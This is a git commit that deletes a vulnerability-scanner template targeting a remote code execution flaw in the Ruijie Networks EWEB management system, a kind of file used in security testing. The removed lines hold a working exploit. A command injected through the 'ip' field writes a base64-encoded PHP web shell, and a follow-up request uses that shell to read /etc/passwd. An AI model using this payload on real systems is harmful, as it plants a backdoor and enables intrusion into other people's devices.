From c9536e95c4a81c619cbfa8c3ab229787f1827a8a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 1 Nov 2022 18:51:26 +0530 Subject: [PATCH] Delete ruijie-networks-rce.yaml --- .../ruijie/ruijie-networks-rce.yaml | 43 ------------------- 1 file changed, 43 deletions(-) delete mode 100644 vulnerabilities/ruijie/ruijie-networks-rce.yaml diff --git a/vulnerabilities/ruijie/ruijie-networks-rce.yaml b/vulnerabilities/ruijie/ruijie-networks-rce.yaml deleted file mode 100644 index bf405a66f3..0000000000 --- a/vulnerabilities/ruijie/ruijie-networks-rce.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: ruijie-networks-rce - -info: - name: Ruijie Networks-EWEB Network Management System - Remote Code Execution - author: pikpikcu - description: Ruijie Networks EWEB Network Management System is susceptible to remote code execution. - severity: critical - reference: - - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py - - https://www.ruijienetworks.com - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: ruijie,rce,network - -requests: - - raw: - - | - POST /guest_auth/guestIsUp.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded;charset=UTF-8 - - ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00 - - - | - GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded;charset=UTF-8 - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - "nobody:x:0:0:" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/03